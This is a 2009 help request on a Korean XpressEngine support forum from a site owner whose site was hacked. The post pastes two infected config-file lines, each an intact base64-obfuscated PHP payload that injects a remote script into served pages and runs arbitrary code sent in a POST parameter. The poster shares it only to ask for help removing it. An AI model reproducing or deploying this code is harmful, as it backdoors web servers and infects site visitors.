묻고답하기

  2. Support
  3. 묻고답하기

base64_decode

2009.11.18 18:59

닉.네.임

현재 홈피가 마비되었습니다.

호스팅에 알아보니 해킹이 어쩌구.....개인정보가 누출....

화일 찾아보니

 

/html/config/config.inc.php에

 

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnYWFyJykpe2Z1bmN0aW9uIGFhcigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWxjMmQxY25WcmRXeGhMbU52YlM5NVlXaHZiMTl6YVhSbFgyRmtiV2x1TDJsdVpHVjRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gYWFyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGFhcjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGFhcjEpKWNhbGxfdXNlcl9mdW5jKCRhYXIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdhYXInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdhYXInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kYWFybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignYWFyMicpKSE9J2FhcjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php

 

이렇게 되어 있고

 

/html/files/config/db.config.php에

 

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnampkJykpe2Z1bmN0aW9uIGpqZCgkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMWxjMmQxY25WcmRXeGhMbU52YlM5NVlXaHZiMTl6YVhSbFgyRmtiV2x1TDJsdVpHVjRMbkJvY0NBK1BDOXpZM0pwY0hRKycpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gampkMigkYSwkYiwkYywkZCl7Z2xvYmFsJGpqZDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGpqZDEpKWNhbGxfdXNlcl9mdW5jKCRqamQxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdqamQnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdqamQnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kampkbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignampkMicpKSE9J2pqZDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php if(!defined("__ZBXE__")) exit();

 

이런게 있습니다.

 

호스팅업체에서는 전문가를 동원해서 화일 하나하나 검색해 위와 같이 삽입된 악성코드를 삭제해야 한다고 합니다.

저에 개인신상 정보가 노출되 발생된 일이라고요.

 

그래서 /html/files/config/db.config.php의 악성코드 삭제 files외 전체 삭제후 1.2.4를 다운받아 설치했으나 멍통

이럴때에는 어찌해야 하나요?

방법 좀 알려 주시면 감사하겠습니다.

 

 

 

이 게시물을
좋아요
목록
글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
소피아7 게시판이나 페이지를 생성하면 페이지를 찾을 수 없다고 나옵니다. [6] 2010.01.25 by 소피아7
숏다리스 게시글 등록시 이메일을 관리자로 보내면 도메인이 빠진 주소가 전달됩니다.  
하이스쿨페이지 게시글에 작성자 아이디와 닉네임이 동시에 나타나게 하기. [1] 2010.01.25 by 라르게덴
jhprks 데이터 이전 더 빨리 할수 있는 방법?  
디엔데빌 조인 쿼리시 문제 <<쿼리문 추가했습니다>> [1] 2010.01.25 by 라르게덴
@!@ 댓글 등록시 분류명이 동시에 바뀌려면 어떻게 해야 하나요? file  
총총총끼싸 제로보드XE UTF-8 밖에없는건가요 [1] 2010.01.25 by 백성찬
오델라가루 xxx.com/xe/ 설치시 시작페이지 문제 [1] 2010.01.25 by 백성찬
jhprks XE 웹사이트 통채로 옮기는 방법? [2] 2010.01.25 by Gekkou
LeeSang 텍스타일로 게시글 복사 [2] 2010.01.25 by LeeSang
김예찬967 게시판 글자수제한(제목길이) 하는방법 알고싶습니다 [1] 2010.01.25 by 레디오빠
so_simple 게시판 ex 사용시 최신글 위젯  
오몰레이드 겔러리형의 이미지가 나오지않습니다 [1] file 2010.01.25 by 백성찬
cje321 업데이트 후 플래너 일정이 보이질 않네요 [1] 2010.01.25 by 백성찬
@!@ 분류항목을 주문자와 관리자로 구분하여 나타낼수 있나요? [1] file 2010.01.25 by @!@
지아엄마 게시판에서요 ..  
비밀얌 로그인 옆에 프로필과 랭귀지 XE 사이트 처럼 할려면?? file  
디엔데빌 조인 쿼리시 문제 [1] 2010.01.25 by 라르게덴
skiny 서비스 메뉴에 게시판이 없어요;; [1] 2010.01.25 by 백성찬
젠이 게시물의 날짜와 시간을 수정하려면 어떻게 해야 되나요? [1] 2010.01.25 by 레디오빠
젠이 페이지 모듈로 작성한 페이지를 통채로 다운받으려면 어떻게 해야 되나요?  
ChangJo_JJ+ 위젯 스타일에 대해서~ [1] file 2010.01.25 by DuRi
poko html -index page  
개발. 혹시 직거래장터 같은 형태의 게시판 없나요..? [1] 2010.01.25 by 젠이
뺑파 회원가입폼 필수항목을 수정하고 싶어요  
St.Veiry 본문에서 링크한 이미지 파일은 최신 이미지 위젯에 안나오나요? [1] 2010.01.25 by 백성찬
로엘로니 게시물(글) 수정시 나타나는 오류 [1] 2010.01.25 by 백성찬
김은비522 동영상만 올리는 게시판을 만들려고 하는데요...  
나쁜포도 XE Official Ver2 스킨에서 사이트맵 없애는 법은 없나요? [1] 2010.01.25 by 이바지
정시연 게시판 본문에서 링크된 주소를 클릭하니 현재창에서...  
태그 쓰기